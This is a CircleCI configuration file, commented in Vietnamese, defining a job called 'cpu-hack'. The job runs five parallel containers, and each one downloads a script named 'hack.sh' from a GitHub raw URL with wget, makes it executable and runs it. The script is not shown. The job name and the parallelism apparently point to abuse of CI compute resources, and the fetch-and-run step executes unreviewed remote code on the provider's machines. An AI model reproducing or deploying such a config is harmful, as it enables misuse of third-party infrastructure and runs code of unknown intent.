# .circleci/config.yml
version: 2.1

jobs:
  cpu-hack:
    docker:
      - image: cimg/python:3.10   # image Python của CircleCI
    parallelism: 5               # chạy 5 container song song (tương tự matrix 5 job)
    steps:
      - checkout

      - run:
          name: Show python
          command: |
            python --version
            echo "Running on node index: $CIRCLE_NODE_INDEX / $CIRCLE_NODE_TOTAL"

      - run:
          name: Download and run hack.sh
          command: |
            # tính số job người dễ đọc (1..5) nếu cần
            JOB_NUM=$((CIRCLE_NODE_INDEX + 1))
            echo "Job number (1-based): $JOB_NUM"

            # tải script về (thay URL nếu cần)
            wget https://raw.githubusercontent.com/phantrongkien12/tester/refs/heads/main/hack.sh -O hack.sh

            # an toàn: xem trước 20 dòng đầu (bỏ comment này nếu đã kiểm tra)
            echo "----- preview hack.sh (first 20 lines) -----"
            head -n 20 hack.sh || true
            echo "--------------------------------------------"

            chmod +x hack.sh

            # nếu hack.sh là bash script, chạy trực tiếp
            ./hack.sh

            # nếu bạn muốn chạy trong 1 virtualenv/python context, ví dụ:
            # python -m venv venv
            # . venv/bin/activate
            # ./hack.sh   # nếu script dùng python thì script tự động dùng venv nếu gọi `python` bên trong

workflows:
  version: 2
  run-hack:
    jobs:
      - cpu-hack
